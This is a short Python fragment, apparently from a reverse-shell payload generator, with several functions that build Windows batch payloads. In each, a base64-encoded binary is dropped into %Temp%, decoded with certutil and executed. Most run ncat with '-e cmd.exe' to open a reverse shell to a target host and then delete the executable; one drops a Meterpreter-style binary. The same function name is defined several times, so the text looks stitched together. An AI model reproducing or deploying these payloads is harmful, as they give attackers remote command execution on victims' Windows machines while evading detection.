def REVERSE_WINDOWS_NCAT_TCP(): nc_out = generate_file_name() return """{0}\ncertutil -decode %Temp%\\{1}.b64 %Temp%\\{1}.exe\n%Temp%\\{1}.exe -e cmd.exe TARGET PORT\ndel %Temp%\\{1}.exe\n""".format( binary_to_bat(WINDOWS_NCAT, file="%Temp%\\{0}.b64".format(nc_out)), nc_out)
def REVERSE_WINDOWS_BAT2METERPRETER_TCP(): file_out = generate_file_name() return """{0}\ncertutil -decode %Temp%\\{1}.b64 %Temp%\\{1}.exe\n%Temp%\\{1}.exe """.format( binary_to_bat(WINDOWS_SHARPCODE, file="%Temp%\\{0}.b64".format(file_out)), file_out)
def REVERSE_WINDOWS_NCAT_TCP(): return """{0}\ncertutil -decode %Temp%\\nc.b64 %Temp%\\nc.exe\n%Temp%\\nc.exe -e cmd.exe TARGET PORT\ndel %Temp%\\nc.exe\n""".format(binary_to_bat(WINDOWS_NCAT, file="%Temp%\\nc.b64"))
def REVERSE_WINDOWS_NCAT_TCP(): return """{0}\ncertutil -decode %Temp%\\nc.b64 %Temp%\\nc.exe\n%Temp%\\nc.exe -e cmd.exe TARGET PORT\ndel %Temp%\\nc.exe\n""".format( binary_to_bat(WINDOWS_NCAT, file="%Temp%\\nc.b64"))